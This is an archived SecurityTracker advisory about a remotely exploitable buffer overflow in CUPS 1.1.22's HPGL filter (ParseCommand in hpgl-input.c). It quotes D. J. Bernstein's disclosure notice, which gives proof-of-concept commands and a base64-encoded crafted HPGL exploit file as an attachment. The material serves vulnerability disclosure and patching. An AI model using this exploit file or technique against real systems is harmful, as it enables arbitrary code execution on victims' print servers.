SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   CUPS Vendors:   Easy Software Products
CUPS HPGL Buffer Overflow in ParseCommand() Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012566
SecurityTracker URL:  http://securitytracker.com/id/1012566
CVE Reference:   CAN-2004-1267   (Links to External Site)
Updated:  Dec 23 2004
Original Entry Date:  Dec 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1.22
Description:   A vulnerability was reported in CUPS in the processing of HPGL files. A remote user can cause arbitrary code to be executed by the target user.

D. J. Bernstein reported that a remote user can create a specially crafted HPGL file that, when printed by the target user with CUPS, will execute arbitrary code on the target user's system. The code will run with the privileges of the 'lp' user.

The buffer overflow resides in the ParseCommand() function in 'hpgl-input.c'.

Ariel Berkman is credited with discovering this flaw.

Impact:   A remote user can cause arbitrary code to be executed on the target system with 'lp' user privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.cups.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 13 2005 (Red Hat Issues Fix) CUPS HPGL Buffer Overflow in ParseCommand() Lets Remote Users Execute Arbitrary Code   (bugzilla@redhat.com)
Red Hat has released a fix.
Jan 18 2005 (Mandrake Issues Fix) CUPS HPGL Buffer Overflow in ParseCommand() Lets Remote Users Execute Arbitrary Code   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.



 Source Message Contents

Date:  15 Dec 2004 08:20:11 -0000
Subject:  [remote] [control] CUPS 1.1.22 hpgltops ParseCommand overflows buf



--YZ5djTAD1cGYuMQK
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Ariel Berkman, a student in my Fall 2004 UNIX Security Holes course, has
discovered a remotely exploitable security hole in CUPS. I'm publishing
this notice, but all the discovery credits should be assigned to
Berkman.

A CUPS installation is at risk whenever it prints an HPGL file obtained
from email (or a web page or any other source that could be controlled
by an attacker). You are at risk if you print data through a CUPS
installation at risk. The source of the HPGL file has complete control
over the CUPS ``lp'' account; in particular, he can read and modify the
files you are printing.

Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type

   cd /usr/ports/print/cups
   make install

to download and compile the CUPS package, version 1.1.22 (current).
Then, as any user, save the file 21.hpgl.gz attached to this message,
and type

   gunzip 21.hpgl
   /usr/local/libexec/cups/filter/hpgltops \
   15 $USER test-title 1 none 21.hpgl > 21.ps

with the unauthorized result that a file named x is removed from the
current directory. (I tested this with a 541-byte environment, as
reported by printenv | wc -c.)

Here's the bug: In hpgl-input.c, ParseCommand() reads any number of
bytes into a 262144-byte buf[] array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--YZ5djTAD1cGYuMQK
Content-Type: application/x-gunzip
Content-Disposition: attachment; filename="21.hpgl.gz"
Content-Transfer-Encoding: base64

H4sICO/Zv0ECAzIxLmhwZ2wA7dG7SmNhFAVgjFMkYOGghWBzakFDBmwSBH9BohDlHHSK6cb7
/ZZ4SSn8Tc7LzBMIJqcUfA9hWvtonsDO6vtg7bX6vb7Z2EprjdlW2Gz+Ds3VpbW02Wq0VgIA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAADAF/5v/MlfYjGT/6z18/AjFlN5Vo5FOc8mYlGKxVieTeZhuhfmeuFX
Lyz2Qj2Lg/JnkjgoxcFYFvuN9PWx1k+XP+vt33A43Nnd2z84PDo+OT07v7i8ur5pd27v7h+6
adheW6runlzWq3ed9mgko1PtHCfze0n7IukueAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8g7/v
T8+jjFcqlQ8gImE3JAAEAA==

--YZ5djTAD1cGYuMQK--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC